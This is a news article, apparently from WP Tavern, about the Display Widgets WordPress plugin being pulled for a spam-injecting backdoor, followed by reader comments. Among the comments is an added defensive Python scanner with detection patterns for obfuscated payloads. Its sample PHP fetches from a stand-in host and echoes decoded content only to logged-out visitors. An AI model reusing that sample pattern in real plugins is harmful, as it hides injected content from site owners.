Display Widgets Plugin Permanently Removed from WordPress.org Due to Malicious Code

Display Widgets, a plugin with more than 200,000 active installs, has been removed from WordPress.org due to its authors inserting malicious code. SEO consultant David Law was the first to bring this issue to the attention of the plugin team after discovering that Display Widgets was inserting content into sites from external servers and also collecting visitor data without permission. He posted to the WordPress.org forums several times to warn other users.

Wordfence has been warning its customers about the plugin during the past several months and published a timeline tracking how Display Widgets was removed from WordPress.org on four separate occasions. According to their independent investigation, the plugin included a backdoor that allowed the plugin author to publish spam content to the sites where Display Widgets is installed. It also hid that content from logged-in users, so site administrators would not see it.

Pagely banned the Display Widgets plugin from its hosting platform this week:

For our customers’ safety, we have banned the plugin from our customer sites… The plugin will remain banned on our network until a time that we see someone has taken responsibility for the plugin and the future of patching its code.

Display Widgets had recently changed hands, as it was acquired from the team that created Formidable Forms. The previous owners have issued a warning about the plugin on Twitter, advising users to remove it from their sites.

It is not yet confirmed whether the plugin was acquired solely for the purpose of distributing malware, but its new owners have been fairly persistent about getting it added back to WordPress.org after each of its violations.

Display Widgets Users Advised to Update to Version 2.7 or Remove the Plugin

Users have no way of finding out that they are running malicious code unless they hear about it from their host, security company, or some other third party. They do not receive a notice in the WordPress admin about the plugin having been removed from the directory. Since Display Widgets was a fairly popular plugin, there are likely many sites that still have it active, and those website owners are probably unaware of the spam content they are publishing.

Yesterday the plugin team issued a notice that Display Widgets 2.7 is a clean version that restores the plugin to version 2.0.5, the code from before the malicious changes were added:

We will be leaving this version deploying updates, however at this time we will NOT be allowing for its adoption. The second owner has effectively destroyed any trust a person might have in the plugin.

Note: You CANNOT visit the page or download it as a new plugin for a reason. This plugin is done. It’s not supported, it’s not worked on, nothing. So if you have it, upgrade. Otherwise, find something else to use.

Display Widgets is now likely to end up in the graveyard of abandoned plugins, but there are many other options for adding conditional widget display to WordPress sites. Jetpack’s widget visibility module, Widget Options by Phpbits Creative Studio, Custom Sidebars by WPMU Dev, and Content Aware Sidebars are a few popular alternatives on WordPress.org.

The plugin team does not currently disclose why certain plugins have been closed or removed from WordPress.org, but they are working on providing better communication for users. One Meta Trac ticket requests that closed plugins have a public page instead of disappearing completely. In another related ticket, plugin team member Mika Epstein has proposed that when plugins are closed or disabled, there should be a dropdown for WordPress.org admins to select a reason why. She suggested the following as available options:

  • Security Issue
  • Author Request
  • Guideline Violation
  • Licensing/Trademark violations
  • Merged into Core

The issue with Display Widgets was fairly public as users posted about their investigations on the WordPress.org support forums and various companies issued warnings about it. However, many plugins are disabled without the public knowing why. Even a short explanation like the proposed examples above would be a major improvement over leaving WordPress.org plugin users in the dark. It would assist site owners in knowing whether they need to prioritize looking for an alternative or simply wait until the situation is resolved.

29 Comments


  1. I’m surprised there’s no software check in place that scans the code for disallowed PHP or JS functions ( base64_encode(), etc ) when pushing up to the Repo… That would’ve thrown a red flag immediately.



    1. Agreed 100%. I’m baffled that base64 code doesn’t get immediately rejected by the WP Repo.



      1. Any use of Base 64 in plugins actually sends me an email when committed. I read all of those emails and look at the code. 99% of them are totally harmless and reasonable. I’ve continued to read them all for the last 5 years because of that 1% that’s not.



    2. This makes me wonder how many others plugins there might be on .org containing intentionally malicious code. Are there any third parties that scan the directory for these things?



      1. In June we started monitoring changes made to plugins in the directory to try to catch some serious vulnerabilities. Some of the checks we do are based off of previous instances of intentionally or possibly intentionally malicious code. So that could catch some future instances of it, but realistically it would be very difficult to catch instances where the developer makes an effort to hide what they are doing, as was the case with this plugin, with that type of monitoring. It would be great if other companies were doing that type of monitoring as well, as even without catching intentionally malicious code, there are plenty of vulnerabilities in plugins that could be caught through that, based on the vulnerabilities we have found so far.

        We also monitor the support forum for indications of security issues in plugins, which could pick up some discussions that point to intentionally malicious code being in plugins, but with this situation it only alerted us to what was going on at the end. If someone is aware of a security situation with a plugin that isn’t getting properly handled in the future, please let us know.

        We are not aware of any disallowed PHP or JS function and there doesn’t appear to be any mention of that in the developer guidelines. If there are any that are disallowed that have security implications, please let us know and we can start monitoring for usage of them.


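The commit-time review described in this thread (an alert on any base64 use, plus monitoring plugin changes for patterns seen in earlier malicious code) is illustrated by the following added Python scanner; it is example code, not anything from WordPress.org, Wordfence or a commenter. It flags the behaviours the article describes (decoded payloads, remote content echoed into the page, output gated on the visitor not being logged in) over constructed sample sources; the sample file names and contents are assumptions.

```python
import re

# Call patterns a plugin-commit reviewer would want surfaced for a manual read.
# A hit is a signal to look, not proof of malice: most base64 use is harmless.
SUSPICIOUS_CALLS = {
    "base64_decode": "decodes a hidden payload",
    "eval": "executes dynamically built code",
    "gzinflate": "unpacks a compressed payload",
    "str_rot13": "decodes an obfuscated string",
}
CALL = re.compile(r"\b(" + "|".join(map(re.escape, SUSPICIOUS_CALLS)) + r")\s*\(")
# Remote content pulled into the site, the behaviour the article describes.
REMOTE_FETCH = re.compile(r"\bwp_remote_(get|post)\s*\(|\bfile_get_contents\s*\(\s*['\"]https?://")
# Output shown only to visitors who are not logged in, hidden from the admin.
LOGIN_GATE = re.compile(r"!\s*is_user_logged_in\s*\(")


def scan_php(path, source):
    """Return (path, line_no, reason) tuples for lines that merit review."""
    findings = []
    for no, line in enumerate(source.splitlines(), start=1):
        if line.lstrip().startswith(("//", "#", "*", "/*")):
            continue  # comment lines cannot execute; skip them
        for m in CALL.finditer(line):
            findings.append((path, no, SUSPICIOUS_CALLS[m.group(1)]))
        if REMOTE_FETCH.search(line):
            findings.append((path, no, "fetches remote content"))
        if LOGIN_GATE.search(line):
            findings.append((path, no, "branches on the visitor not being logged in"))
    return findings


def scan_plugin(files):
    """files maps a relative path to its PHP source; returns sorted findings."""
    findings = []
    for path, source in files.items():
        findings.extend(scan_php(path, source))
    return sorted(findings)


# Constructed sample sources (hypothetical; not the real plugin's code).
SAMPLE_PLUGIN = {
    "benign.php": "<?php\n// Inline an icon as a data: URI; encoding is fine.\n"
                  "$icon = base64_encode(file_get_contents(__DIR__ . '/icon.png'));\n",
    "suspicious.php": "<?php\nif ( ! is_user_logged_in() ) {\n"
                      "    $r = wp_remote_get( 'http://example.invalid/feed' );\n"
                      "    echo base64_decode( $r['body'] );\n}\n",
}

for path, no, reason in scan_plugin(SAMPLE_PLUGIN):
    print(f"{path}:{no}: {reason}")  # one line per finding for a reviewer to read
```

The benign file produces no findings, since base64_encode and a local file read are not matched; only the suspicious file's three lines are reported.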

  2. Pretty pathetic the Author wants people to “cut me some slack” with malicious code. C’mon now.



  3. Just putting a reason or a public page on a removed plugin is not enough. How many times after you’ve installed a plugin have you gone back to that plugin’s page on the repo? In most cases, I would think, that would be zero. So you would never know it even got removed, much less why.

    There are two responsible solutions to this problem as I see it, and both are necessary.

    1. A notification must be shown on every site’s Plugin admin page that is using the plugin. Just as though the plugin had an update, it should have a link that shows “Important Notice” or some such wording instead of “There is a new version available”. And of course, that notice should be linked to some sort of notification that the plugin has been removed and why. (Don’t even tell me that would make security worse. Please… we live in an age where disclosure is the right thing, not the wrong thing).

    2. If a plugin is “removed” permanently, a version that is reverted to a known-good version or a fixed version should be put in its place, and frozen…just as was finally done in this particular case. I like the way they finally handled this one.

    It’s kind of insane that current users of plugins removed for security reasons never ever know that there is a problem with the plugin they are using, unless they just happen to run across someone talking about it on a blog or social media somewhere. That’s.just.crazy. Notify users, dang it. NOTIFY USERS. Geez.



    1. I’ve said the same thing a hundred times.

      Beyond that, I used the original version of Display Widgets on over 100 sites. Went to look for it in July and it was delisted. Looked into why and found discussion about the spammy links. My coworkers and I had this exact discussion then, regarding this exact plugin!



    2. I fully agree that following these 2 steps would be a great solution for cases like this.

      It should already be possible for the security team at wordpress.org to push out automatic plugin security updates so sites will update affected plugins in the background (like core):
      https://make.wordpress.org/plugins/2015/03/14/plugin-automatic-security-updates/

      Plugin readmes also have a section called “Upgrade Notice” but as far as I know, anything written there is not parsed or displayed anywhere to the user. That could be used to display important notices for a specific update, but as plugin developers can change the text themselves, I could see how it could be abused.

      As with everything else, communication is key.



      1. For your information, I discovered ThreatPress plugin: https://wordpress.org/plugins/threatpress-security/ . They are checking all your site’s plugins and themes against their database of vulnerabilities which they say is updated daily. It includes all known vulnerabilities, Display Widgets too.



    3. In total agreement with Joachim! Last week, when I saw an update for the plugin, the accompanying “Rollback to version x.y to remove recent changes” message made me curious as to what was going on. First thing I did was head for the plugin repo to see the changelog, as the link in WP admin wasn’t working, but I couldn’t find the plugin.

      In cases like this a ‘holding page’ with more information / advice on how to proceed will benefit everyone, especially WordPress newbies.



  4. At least 3 things are surprising here:

    – WP moderator’s tone in messages about this removal (I would rather apologize for letting such mess happen instead of giving military style orders and closing comments)

    – The total absence of suggested alternatives for the 200,000 existing installs (this article provides some of them but do all users that installed this thing 200,000 times read it here? – I would rather have kept the plugin’s page live and provided alternatives for them there + alerted them about what happened)

    – How come there is no CLASS ACTION SUIT for such cases? (200,000 installs would represent something like 10,000 abused users and that would make a nice lawsuit to serve as example for the next ones that would like to try playing the same game).



  5. I emailed the WordPress team when I discovered hidden spam pages on my blog. They did take the plugin down; the problem is, taking it down does not solve the problem. They should provide a security warning and a clean update.



  6. That’s why plugin authors that sell/give up their plugins take so much care to release them into good hands.

    I hope Formidable Forms have learned their lesson, as this whole story will have a negative impact on their brand name.



    1. Why would it have a negative impact on them? They are not, nor should they be responsible for what an individual or business does with the product once it has been legally sold and transferred.

      If your neighbors moved and the couple who bought the house stopped maintaining their yard, whose fault is that?

      I’m sure the plugin author didn’t sell Display Widgets expecting this to happen, but placing any of the blame on them whatsoever is wrong.



      1. It’s not about blaming, it’s about what will happen in real life. Pure psychology: your brand name gets related to something bad, etc.

        Probably many of their own clients were using this plugin, and it doesn’t matter that the plugin was sold; what matters is that websites that were using that plugin were affected in a very negative way.

        So the plugin owner sold not only the plugin (a house), but also the phone book with contacts and the ability to enter the houses of all the people in that book.

        That’s why when you read about acquisitions on WP Tavern, you notice how careful authors are when choosing the party that will inherit the product.



    2. Otto actually made a post about scenarios like this a while back. It’s worth a read: https://make.wordpress.org/plugins/2016/02/12/on-the-topic-of-selling-your-plugins/

      I agree that the people behind Formidable Forms should not be blamed for the buyer’s behaviour, and shouldn’t apologize or anything. It’s clear in the article on Wordfence that they regret selling the plugin to the new owner.

      Content Aware Sidebars, one of the alternatives Sarah mentioned, has never been for sale, but I still get unsolicited offers from time to time. As I never read the emails fully before marking them as spam, unfortunately I don’t know if I’ve been contacted by the same person(s) that acquired Display Widgets.



  7. I am a long-time user of this plugin. I installed the first update by the new plugin owner on a test site and immediately noticed problems, so did not install it (or any subsequent updates) on any live sites.

    My sites have not, therefore, been harmed by this episode. But I have been following closely what has been going on.

    What is missing from Sarah’s report is the shocking treatment meted out to David Law by the wordpress.org moderators. He even had his account suspended for a time!

    He was essentially acting as a whistle-blower, and yet got treated as if it were he who was in the wrong.

    Not for the first time, moderator Jan Dembowski behaved like a bully.

    And Mika Epstein’s own explanation of how this episode was allowed to unfold as it did paints her as naive in the extreme.

    To err is human. But their repeating the same mistakes in future would be less forgivable.

    A public apology to David Law would not go amiss.



  8. There’s just got to be a way to get the word out about these types of situations. Personally, I was alerted that the plugin was removed from the repository via the Wordfence plugin. Otherwise, I’d have no idea that this happened (and I work with WordPress and follow news daily).

    As for the defensive stance seen in the forums, I can attest to it. A forum post where we were discussing what happened to the plugin was closed to new comments:
    https://wordpress.org/support/topic/display-widgets-plugin-v2-6-3-1-includes-hacking-code/page/2/

    With the moderator stating:

    “I’m going through and closing posts about this. There’s little point in people going around and slamming others about this. Remember: people can be mean, but you don’t have to be.”

    I don’t even think anyone was directly trying to slam anyone. It was just a frustration of how this plugin was getting removed and re-added over the summer and that warnings about its malicious code may not have been handled so well.

    We just need a way to warn others when something like this occurs. Even if it’s a small notice on the plugins page.



  9. Over the years, I have happily used Display Widgets on dozens and perhaps hundreds of WordPress sites, with no problems. It’s such a shame that it has been acquired by such an unscrupulous company that has no respect for the WordPress community or its values. I know it’s a free plugin, but that doesn’t make it ok. Now I will have to change the MANY blog posts where I have recommended Display Widgets and switch to Jetpack Visibility or similar instead!



    1. It is a shame because Display Widgets was a really powerful plugin for what it did. This whole thing definitely put a lot of us in panic mode.



  10. I agree with the replies above. The mods on WordPress.org did not handle it very well IMHO. They should take lessons from the situation instead of letting egos and power play get in the way. At least that’s how I perceive it. Not very community-like… In the end they’re on the same side, right? This kind of reaction may lead to people (whistle-blowers) staying quiet and moving on to something else.

    Another concern I share with others is how safe the repository still is. Also I think that this kind of threat does not limit itself to plugins only but may affect themes as well. Heck, it may not even be limited to the repo but extend to marketplaces as well.

    It’s another wake-up call that we can all take lessons from.



  11. Thanks for suggesting Widget Options as a replacement. I’m the plugin creator and I’ve actually created a migration tool to move Display Widgets’ saved preferences to Widget Options. It’s my way of saying thanks to those who are choosing my plugin. The migration tool is available for free on GitHub: https://github.com/phpbits/widget-options-migrator and has full details, and instructions are here: https://widget-options.com/easily-migrate-display-widgets/ .

    Cheers!



    1. That’s fantastic Jeffrey, I was groaning at the thought of migrating our clients to another plugin because some of their Display Widgets settings are quite complex. I have been hoping that someone honest will take over Display Widgets and fork it! Please could you confirm whether Widget Options has a feature to show/hide widgets based on post ID?



      1. Hi,

        Sorry for the late response, not sure why I wasn’t notified. Widget Options support for Post IDs is available on “Display Widget Logic” using is_single(). Using the migrator, it will automatically add this code for you :) Let me know how it goes. Thanks!

